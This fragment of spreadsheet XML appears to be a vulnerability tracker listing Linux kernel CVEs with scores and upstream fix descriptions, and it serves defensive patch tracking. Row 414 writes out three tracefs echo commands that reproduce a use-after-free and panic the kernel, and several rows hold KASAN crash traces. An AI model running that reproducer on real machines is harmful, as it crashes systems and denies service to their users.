of adjacent kernel heap memory.
Bump pixfmt_fwht.sizeimage_mult from 3 to 4, matching the largest
components_num among the supported raw formats, so the capture buffer is
always large enough for the unencoded fallback.</t>
        </is>
      </c>
      <c r="S408" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89724</t>
        </is>
      </c>
    </row>
    <row r="409">
      <c r="A409" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B409" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C409" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89733</t>
        </is>
      </c>
      <c r="D409" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E409" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F409" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G409" s="5" t="inlineStr"/>
      <c r="H409" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I409" s="5" t="inlineStr"/>
      <c r="J409" s="5" t="inlineStr"/>
      <c r="K409" s="5" t="inlineStr"/>
      <c r="L409" s="5" t="inlineStr"/>
      <c r="M409" s="5" t="inlineStr"/>
      <c r="N409" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O409" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P409" s="5" t="inlineStr"/>
      <c r="Q409" s="5" t="inlineStr"/>
      <c r="R409" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
usb: gadget: uvc: fix dangling pointers in uvc_function_bind() and uvc_function_unbind()
In uvc_function_bind() error path, we use usb_ep_free_request which
uses uvc-&gt;control_req but does not set it to NULL afterwards. Thus,
uvc-&gt;control_req is a dangling pointer causing a UAF. Also we do not set
the uvc-&gt;control_buf pointer to NULL after freeing it, which is another
dangling pointer. Fix it by setting uvc-&gt;control_req to NULL after we run
usb_ep_free_request() and uvc-&gt;control_buf to NULL after kfree. Do the
same for uvc_function_unbind().</t>
        </is>
      </c>
      <c r="S409" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89733</t>
        </is>
      </c>
    </row>
    <row r="410">
      <c r="A410" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B410" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C410" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89736</t>
        </is>
      </c>
      <c r="D410" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E410" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F410" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G410" s="5" t="inlineStr"/>
      <c r="H410" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I410" s="5" t="inlineStr"/>
      <c r="J410" s="5" t="inlineStr"/>
      <c r="K410" s="5" t="inlineStr"/>
      <c r="L410" s="5" t="inlineStr"/>
      <c r="M410" s="5" t="inlineStr"/>
      <c r="N410" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O410" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P410" s="5" t="inlineStr"/>
      <c r="Q410" s="5" t="inlineStr"/>
      <c r="R410" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
usb: gadget: u_audio: Fix use-after-free on sound card disconnect
g_audio_cleanup() invokes snd_card_free_when_closed() to initiate sound
card teardown and immediately frees the underlying struct snd_uac_chip
context. However, snd_card_free_when_closed() returns asynchronously
while ALSA control elements (kctls) remain open in userspace.
When userspace control applications access or close these open file
descriptors, kctl callbacks attempt to dereference kctl-&gt;private_data
pointing to &amp;uac-&gt;c_prm or &amp;uac-&gt;p_prm within the freed uac structure,
resulting in a use-after-free (UAF) memory corruption.
Fix this issue by deferring the destruction of struct snd_uac_chip until
all references to the ALSA sound card are released. Register a custom
card-&gt;private_free callback (u_audio_card_free) during g_audio_setup()
that frees uac and its associated playback/capture request and ring
buffers only when the sound card reference count drops to zero.</t>
        </is>
      </c>
      <c r="S410" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89736</t>
        </is>
      </c>
    </row>
    <row r="411">
      <c r="A411" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B411" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C411" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89738</t>
        </is>
      </c>
      <c r="D411" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E411" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F411" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G411" s="5" t="inlineStr"/>
      <c r="H411" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I411" s="5" t="inlineStr"/>
      <c r="J411" s="5" t="inlineStr"/>
      <c r="K411" s="5" t="inlineStr"/>
      <c r="L411" s="5" t="inlineStr"/>
      <c r="M411" s="5" t="inlineStr"/>
      <c r="N411" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O411" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P411" s="5" t="inlineStr"/>
      <c r="Q411" s="5" t="inlineStr"/>
      <c r="R411" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
usb: gadget: at91_udc: drain polled-VBUS timer/work before udc is freed
In polled-VBUS mode (board.vbus_pin &amp;&amp; board.vbus_polled), probe arms a
self-restarting cycle: at91_vbus_timer() schedules vbus_timer_work, and
at91_vbus_timer_work() calls at91_vbus_update() and re-arms the timer via
mod_timer(). Both recover the same udc through container_of and dereference
it on every iteration.
Neither teardown path cancels this cycle. udc is devm-allocated, so it is
freed after at91udc_remove() returns, and is likewise freed when probe
fails and devres runs. A timer callback or work item that is pending or
running at either point dereferences the freed udc.
Add at91_udc_shutdown_vbus_timer() and call it from at91udc_remove() and
from the usb_add_gadget_udc() failure path in probe; the remaining probe
error paths fail before the timer is armed. timer_shutdown_sync() waits
for a running callback and clears timer-&gt;function, which makes the work
handler's mod_timer() a permanent no-op; cancel_work_sync() then drains
any pending or running work whose re-arm attempt now does nothing. The
timer must be shut down first, since cancelling the work alone would let
the timer re-queue it. The guard mirrors probe: in IRQ mode the timer and
work_struct are never initialized.
This does not require a fault; a normal driver unbind can interleave with
an already queued work item.
This issue was found by an in-house static analysis tool.</t>
        </is>
      </c>
      <c r="S411" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89738</t>
        </is>
      </c>
    </row>
    <row r="412">
      <c r="A412" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B412" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C412" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89741</t>
        </is>
      </c>
      <c r="D412" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E412" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F412" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G412" s="5" t="inlineStr"/>
      <c r="H412" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I412" s="5" t="inlineStr"/>
      <c r="J412" s="5" t="inlineStr"/>
      <c r="K412" s="5" t="inlineStr"/>
      <c r="L412" s="5" t="inlineStr"/>
      <c r="M412" s="5" t="inlineStr"/>
      <c r="N412" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O412" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P412" s="5" t="inlineStr"/>
      <c r="Q412" s="5" t="inlineStr"/>
      <c r="R412" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Revert "media: v4l2-dev: fix error handling in __video_register_device()"
This reverts commit 2a934fdb01db6458288fc9386d3d8ceba6dd551a.
The intentions of that patch were good, but it doesn't work.
The idea is that if device_register fails, you have to do a put_device
to let the ref counter release resources.
However, the V4L2 API says that if video_register_device() fails, then
you have to call video_device_release(), which kfree()s the video_device
struct.
But the put_device() will already have freed the struct, so you end
up in a double-free scenario.
There is not really a good way of fixing this without breaking
video_register_device() into two parts, one that initializes everything,
and one that does the actual device_register, and then converting all
V4L2 drivers to this new model.
That is a massive job, and it is very unlikely that device_register
will fail.
So rather than ending up in a double-free scenario, just revert this
patch, and in that case we'll have a small memory leak. Which is a lot
more robust.</t>
        </is>
      </c>
      <c r="S412" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89741</t>
        </is>
      </c>
    </row>
    <row r="413">
      <c r="A413" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B413" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C413" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89742</t>
        </is>
      </c>
      <c r="D413" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E413" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F413" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G413" s="5" t="inlineStr"/>
      <c r="H413" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I413" s="5" t="inlineStr"/>
      <c r="J413" s="5" t="inlineStr"/>
      <c r="K413" s="5" t="inlineStr"/>
      <c r="L413" s="5" t="inlineStr"/>
      <c r="M413" s="5" t="inlineStr"/>
      <c r="N413" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O413" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P413" s="5" t="inlineStr"/>
      <c r="Q413" s="5" t="inlineStr"/>
      <c r="R413" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
rapidio: mport_cdev: fix use-after-free in dma_req_free()
dma_req_free() acquires buf_mutex through req-&gt;map, drops the mapping
reference with kref_put(), and then dereferences req-&gt;map again to unlock
the mutex.
If kref_put() drops the last reference, mport_release_mapping() frees the
mapping, and the subsequent mutex_unlock() dereferences a freed object. 
This is a use-after-free.
Fix this by caching map and md before kref_put(), clearing req-&gt;map while
holding buf_mutex, and using the cached md for mutex unlocking.
The bug is reachable from userspace via the RapidIO mport character device
interface.</t>
        </is>
      </c>
      <c r="S413" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89742</t>
        </is>
      </c>
    </row>
    <row r="414">
      <c r="A414" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B414" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C414" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89746</t>
        </is>
      </c>
      <c r="D414" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E414" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F414" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G414" s="5" t="inlineStr"/>
      <c r="H414" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I414" s="5" t="inlineStr"/>
      <c r="J414" s="5" t="inlineStr"/>
      <c r="K414" s="5" t="inlineStr"/>
      <c r="L414" s="5" t="inlineStr"/>
      <c r="M414" s="5" t="inlineStr"/>
      <c r="N414" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O414" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P414" s="5" t="inlineStr"/>
      <c r="Q414" s="5" t="inlineStr"/>
      <c r="R414" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tracing: Fix use-after-free with same-name named triggers
When two hist triggers on different events are registered with the same
name=, the second one reuses the first as named_data.  Both are added to
tr-&gt;hist_vars by save_hist_vars() during event_hist_trigger_parse(),
because save_hist_vars() is called before event_trigger_register() while
the named reuse is only detected later, in hist_register_trigger().
In the named-data branch hist_register_trigger() then frees the second
histogram's hist_data via destroy_hist_data(), but never removes its
tr-&gt;hist_vars list entry, leaving a dangling pointer and leaking the
trace_array reference it holds.
A later hist trigger that references a variable makes find_var_file()
walk tr-&gt;hist_vars and dereference the freed hist_data.  The bug is
reproducible from userspace by writing three hist triggers to tracefs:
  cd /sys/kernel/tracing
  echo 'hist:keys=common_pid:x=common_pid:name=mh' &gt; events/sched/sched_switch/trigger
  echo 'hist:keys=common_pid:x=common_pid:name=mh' &gt; events/sched/sched_process_fork/trigger
  echo 'hist:keys=common_pid:vals=$x' &gt; events/sched/sched_process_exit/trigger
The third write panics the kernel:
  BUG: KASAN: slab-use-after-free in find_var_file.part.0+0x272/0x290
  Read of size 8 at addr ffff888001f8a0e0 by task sh/1
  CPU: 1 UID: 0 PID: 1 Comm: sh Tainted: G      D          N
  Call Trace:
    find_var_file.part.0
    find_event_var
    parse_atom
    parse_expr
    __create_val_field
    event_hist_trigger_parse
    trigger_process_regex
    event_trigger_write
    vfs_write
    ksys_write
    do_syscall_64
    entry_SYSCALL_64_after_hwframe
  Allocated by task 1:
    event_hist_trigger_parse
  Freed by task 1:
    hist_register_trigger+0x618/0xa30
    event_hist_trigger_parse
  The buggy address belongs to freed 2048-byte region
  Oops: general protection fault ... RIP: find_var_file.part.0
  Kernel panic - not syncing: Attempted to kill init! exitcode=0x0000000b
Fix by removing the hist_data from tr-&gt;hist_vars and releasing the
trace_array reference in the named-data branch of hist_register_trigger()
before freeing the hist_data.</t>
        </is>
      </c>
      <c r="S414" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89746</t>
        </is>
      </c>
    </row>
    <row r="415">
      <c r="A415" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B415" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C415" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89747</t>
        </is>
      </c>
      <c r="D415" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E415" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F415" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G415" s="5" t="inlineStr"/>
      <c r="H415" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I415" s="5" t="inlineStr"/>
      <c r="J415" s="5" t="inlineStr"/>
      <c r="K415" s="5" t="inlineStr"/>
      <c r="L415" s="5" t="inlineStr"/>
      <c r="M415" s="5" t="inlineStr"/>
      <c r="N415" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O415" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P415" s="5" t="inlineStr"/>
      <c r="Q415" s="5" t="inlineStr"/>
      <c r="R415" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tracing: Fix use-after-free in trace_pipe read on sub-buffer order change
Writing to buffer_subbuf_size_kb calls ring_buffer_subbuf_order_set(),
which frees every sub-buffer of the ring buffer, including the reader
page, and replaces them with newly allocated ones.
Readers of trace_pipe hold pointers into those pages. ring_buffer_peek()
looks up an event under cpu_buffer-&gt;reader_lock but returns the event
pointer after dropping the lock, and peek_next_entry() then calls
ring_buffer_event_length() and ring_buffer_event_data() on it. If the
sub-buffer order is changed in that window, the reader dereferences
freed memory:
  BUG: KASAN: use-after-free in ring_buffer_peek+0x3e0/0x430
  Read of size 1 at addr ffff88802a4cf010 by task syz-executor989/6002
  Freed by:
   free_buffer_page kernel/trace/ring_buffer.c:398 [inline]
   ring_buffer_subbuf_order_set+0x1325/0x18e0 kernel/trace/ring_buffer.c:7444
   buffer_subbuf_size_write+0x182/0x280 kernel/trace/trace.c:8221
Take trace_access_lock(RING_BUFFER_ALL_CPUS) around the order change.
This is the lock trace_pipe readers already hold across their entire
peek-and-print loop, so the swap can no longer race with a reader that
is dereferencing a peeked event.</t>
        </is>
      </c>
      <c r="S415" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89747</t>
        </is>
      </c>
    </row>
    <row r="416">
      <c r="A416" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B416" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C416" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89748</t>
        </is>
      </c>
      <c r="D416" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E416" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F416" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G416" s="5" t="inlineStr"/>
      <c r="H416" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I416" s="5" t="inlineStr"/>
      <c r="J416" s="5" t="inlineStr"/>
      <c r="K416" s="5" t="inlineStr"/>
      <c r="L416" s="5" t="inlineStr"/>
      <c r="M416" s="5" t="inlineStr"/>
      <c r="N416" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O416" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P416" s="5" t="inlineStr"/>
      <c r="Q416" s="5" t="inlineStr"/>
      <c r="R416" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tracing: Fix retry exhaustion in simple ring buffer reader swap
simple_ring_buffer_swap_reader_page() starts with retry set to 8 and
post-decrements it only after a failed link replacement. On the final
attempt, a successful replacement leaves retry at zero, while a failed
replacement leaves it at -1.
The current !retry test reverses both outcomes. It returns an error after
a successful final replacement, leaving the link update complete but the
reader bookkeeping unfinished. After a failed final replacement, it
falls through and updates the head and reader pointers as though the
replacement succeeded, which can corrupt the ring.
Treat only a negative counter as exhaustion and return the documented
-EBUSY error.</t>
        </is>
      </c>
      <c r="S416" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89748</t>
        </is>
      </c>
    </row>
    <row r="417">
      <c r="A417" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B417" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C417" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89750</t>
        </is>
      </c>
      <c r="D417" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E417" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F417" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G417" s="5" t="inlineStr"/>
      <c r="H417" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I417" s="5" t="inlineStr"/>
      <c r="J417" s="5" t="inlineStr"/>
      <c r="K417" s="5" t="inlineStr"/>
      <c r="L417" s="5" t="inlineStr"/>
      <c r="M417" s="5" t="inlineStr"/>
      <c r="N417" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O417" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P417" s="5" t="inlineStr"/>
      <c r="Q417" s="5" t="inlineStr"/>
      <c r="R417" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tracing/user_events: Clear copied tracing state before fork duplication
dup_task_struct() copies user_event_mm from the parent into the child,
without grabbing a reference to it. user_event_mm_dup() should
replace it, but it leaves that copied pointer unmodified if
user_event_mm_alloc() fails.
When the child exits, user_event_mm_remove() decrements a reference
the child never owned, which ultimately frees user_event_mm, while
the parent still as a stale pointer to it. This creates a UAF, which
KASAN reports as:
    BUG: KASAN: slab-use-after-free in
    current_user_event_mm+0x51/0x1d0 Write of size 4 at addr
    ffff888005010d30 by task init/44
    Call Trace:
     &lt;TASK&gt;
     kasan_report+0xce/0x100
     kasan_check_range+0x10f/0x1e0
     current_user_event_mm+0x51/0x1d0
     user_events_ioctl+0x82e/0x15c0
     __x64_sys_ioctl+0x139/0x1c0
     do_syscall_64+0xce/0x450
     entry_SYSCALL_64_after_hwframe+0x77/0x7f
    Allocated by task 44:
     __kasan_kmalloc+0x8f/0xa0
     __kmalloc_cache_noprof+0x180/0x3a0
     user_event_mm_alloc+0x3c/0x1f0
     current_user_event_mm+0x88/0x1d0
    Freed by task 42:
     __kasan_slab_free+0x43/0x70
     kfree+0x13a/0x390
     process_one_work+0x696/0xf90
     worker_thread+0x420/0xba0
The fix simply clears the copied pointer before any possible failure.
In case of failure, the child then has nothing to free.</t>
        </is>
      </c>
      <c r="S417" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89750</t>
        </is>
      </c>
    </row>
    <row r="418">
      <c r="A418" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B418" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C418" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89754</t>
        </is>
      </c>
      <c r="D418" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E418" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F418" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G418" s="5" t="inlineStr"/>
      <c r="H418" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I418" s="5" t="inlineStr"/>
      <c r="J418" s="5" t="inlineStr"/>
      <c r="K418" s="5" t="inlineStr"/>
      <c r="L418" s="5" t="inlineStr"/>
      <c r="M418" s="5" t="inlineStr"/>
      <c r="N418" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O418" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P418" s="5" t="inlineStr"/>
      <c r="Q418" s="5" t="inlineStr"/>
      <c r="R418" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mm/pagewalk: fix stale walk-&gt;action escaping walk_pmd_range()
If -&gt;pmd_entry() sets walk-&gt;action = ACTION_AGAIN, the pmd_none() check is
retried.  The PMD entry may be cleared at the point of retry.
In this case, if walk-&gt;ops-&gt;install_pte is not specified, the code
continues to the next PMD entry in the range without resetting
walk-&gt;action to ACTION_SUBTREE.
This leaves walk-&gt;action erroneously set to ACTION_AGAIN, which is
incorrect.
This was incorrect but not problematic up until commit 3b89863c3fa4
("mm/pagewalk: fix race between concurrent split and refault") which
updated walk_pud_range() to check for walk-&gt;action == ACTION_AGAIN upon
walk_pmd_range()'s return, causing the PUD walk to be retried.
In this case this results in duplicate walk callbacks being invoked,
which is erroneous and will break any caller that is not idempotent
with respect to this (and waste time for those which are).  The result
is an out-of-bounds write, triggered by a local fuzzer:
[    2.272695] ==================================================================
[    2.273471] BUG: KASAN: slab-out-of-bounds in __mincore_unmapped_range+0x14f/0x190
[    2.274302] Write of size 1 at addr ffff888008d9b000 by task poc/106
[    2.274966]
[    2.275154] CPU: 0 UID: 1000 PID: 106 Comm: poc Not tainted 7.2.0-rc6-00429-ga7c7074b58d2 #55 PREEMPT(lazy)
[    2.275159] Hardware name: QEMU Ubuntu 24.04 PC v2 (i440FX + PIIX, arch_caps fix, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[    2.275164] Call Trace:
[    2.275170]  &lt;TASK&gt;
[    2.275172]  dump_stack_lvl+0x53/0x70
[    2.275200]  print_report+0xd0/0x630
[    2.275210]  ? __pfx__raw_spin_lock_irqsave+0x10/0x10
[    2.275219]  ? irqentry_exit+0xd2/0x670
[    2.275224]  ? irqentry_exit+0xd2/0x670
[    2.275226]  ? __virt_addr_valid+0xef/0x1a0
[    2.275239]  ? __mincore_unmapped_range+0x14f/0x190
[    2.275242]  kasan_report+0xce/0x100
[    2.275245]  ? __mincore_unmapped_range+0x14f/0x190
[    2.275248]  __mincore_unmapped_range+0x14f/0x190
[    2.275252]  mincore_unmapped_range+0x45/0x70
[    2.275254]  walk_pgd_range+0xafc/0xfc0
[    2.275261]  ? __pfx_walk_pgd_range+0x10/0x10
[    2.275264]  ? __update_load_avg_se+0x3d1/0x670
[    2.275275]  __walk_page_range+0xc0/0x310
[    2.275278]  ? __pfx_find_vma+0x10/0x10
[    2.275281]  ? finish_task_switch.isra.0+0x16d/0x4f0
[    2.275290]  walk_page_range_mm_unsafe+0x26f/0x3a0
[    2.275293]  ? __pfx_mtree_load+0x10/0x10
[    2.275298]  ? __pfx_walk_page_range_mm_unsafe+0x10/0x10
[    2.275302]  ? __free_frozen_pages+0x54d/0x7e0
[    2.275308]  __do_sys_mincore+0x132/0x380
[    2.275311]  do_syscall_64+0xf9/0x540
[    2.275316]  entry_SYSCALL_64_after_hwframe+0x77/0x7f
[    2.275322] RIP: 0033:0x422ccd
[    2.275326] Code: b3 66 2e 0f 1f 84 00 00 00 00 00 66 90 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 &lt;48&gt; 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b8 ff ff ff f7 d8 64 89 01 48
[    2.275329] RSP: 002b:00007fffffffec18 EFLAGS: 00000287 ORIG_RAX: 000000000000001b
[    2.275337] RAX: ffffffffffffffda RBX: 0000000000000066 RCX: 0000000000422ccd
[    2.275339] RDX: 00000000004d0940 RSI: 0000000001000000 RDI: 00007ffff4000000
[    2.275340] RBP: 00000000004d0940 R08: 0000000000000100 R09: 0000000000000100
[    2.275342] R10: 0000000000000100 R11: 0000000000000287 R12: 20c49ba5e353f7cf
[    2.275343] R13: 00000000004990d3 R14: 0000000000000000 R15: 0000000000000001
[    2.275346]  &lt;/TASK&gt;
[    2.275347]
[    2.296904] The buggy address belongs to the object at ffff888008d9b000
[    2.296904]  which belongs to the cache sigqueue of size 80
[    2.298151] The buggy address is located 0 bytes inside of
[    2.298151]  allocated 80-byte region [ffff888008d9b000, ffff888008d9b050)
[    2.299408]
[    2.299601] The buggy address belongs to the physical page:
[    2.300191] page: refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x8d9b
---truncated---</t>
        </is>
      </c>
      <c r="S418" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89754</t>
        </is>
      </c>
    </row>
    <row r="419">
      <c r="A419" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B419" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C419" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89755</t>
        </is>
      </c>
      <c r="D419" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E419" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F419" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G419" s="5" t="inlineStr"/>
      <c r="H419" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I419" s="5" t="inlineStr"/>
      <c r="J419" s="5" t="inlineStr"/>
      <c r="K419" s="5" t="inlineStr"/>
      <c r="L419" s="5" t="inlineStr"/>
      <c r="M419" s="5" t="inlineStr"/>
      <c r="N419" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O419" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P419" s="5" t="inlineStr"/>
      <c r="Q419" s="5" t="inlineStr"/>
      <c r="R419" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mm/migrate_device: clear stale mapping after freeing swapcache
__migrate_device_pages() reads the folio mapping before calling
folio_free_swap().  When folio_free_swap() succeeds, the folio is removed
from the swap cache, but the saved mapping still points to swap_space.
Passing the stale mapping to folio_migrate_mapping() makes it use the
mapped-folio path for a folio that is no longer in swapcache.  It can then
operate on swap_space.i_pages with invalid reference accounting,
eventually triggering a folio reference count BUG.
After a successful split, nr still contains the number of pages in the
original large folio, although each resulting page is now a separate
order-0 folio.  Reset nr to 1 so each split folio is processed separately,
including its own swapcache removal and mapping lookup.
Refresh the saved mapping after folio_free_swap() so the current folio
state is used during migration.</t>
